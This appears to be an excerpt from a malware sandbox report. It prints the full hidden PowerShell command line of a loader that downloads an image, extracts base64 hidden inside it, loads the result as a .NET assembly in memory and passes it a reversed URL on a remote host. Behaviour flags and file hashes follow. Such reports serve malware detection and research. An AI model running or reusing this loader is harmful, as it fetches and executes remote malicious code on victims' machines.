C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/63jq5ylJrw9KxLq_1696608110.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.nym/15.33.24.391//:ptth' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"4⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1480
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZATKV9CL2DTTDR4MNYLX.temp
Filesize7KB
MD57f87960970e9e581c79a9c860df487f6
SHA133aff70c3cd824783848da0081641c8c473b3f63
SHA25603dedcac47b0d218130b31b1fd6a53d0ade2003d72576771e0116eb358a849fe
SHA51276694c321e13603005764e3828bdfe3bdcaf0b912eefda06d34c50c25441a0bd983df08c3ace938ef1e78fda1913e5e8511593b93b2b443f940465dc62ac3a93
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD57f87960970e9e581c79a9c860df487f6
SHA133aff70c3cd824783848da0081641c8c473b3f63
SHA25603dedcac47b0d218130b31b1fd6a53d0ade2003d72576771e0116eb358a849fe
SHA51276694c321e13603005764e3828bdfe3bdcaf0b912eefda06d34c50c25441a0bd983df08c3ace938ef1e78fda1913e5e8511593b93b2b443f940465dc62ac3a93
-
Filesize
177KB
MD516ca1b3b70545723e278cef80dd40629
SHA1decd934b39d051560d637b9727f56f9abd5e5491
SHA25611aad61d002a805b706e90facdd0a047796c1f459705bd62a6bc7e67dbcd09a6
SHA512dd2fba9fd39dad7a64566979fa58cc19b872a5119391b146d36fed300fe3fd6117f41b0a17bd60aadbb017b2053afcf673d29e2093270f44d1f5bcde29b8e49c
-
Filesize
177KB
MD516ca1b3b70545723e278cef80dd40629
SHA1decd934b39d051560d637b9727f56f9abd5e5491
SHA25611aad61d002a805b706e90facdd0a047796c1f459705bd62a6bc7e67dbcd09a6
SHA512dd2fba9fd39dad7a64566979fa58cc19b872a5119391b146d36fed300fe3fd6117f41b0a17bd60aadbb017b2053afcf673d29e2093270f44d1f5bcde29b8e49c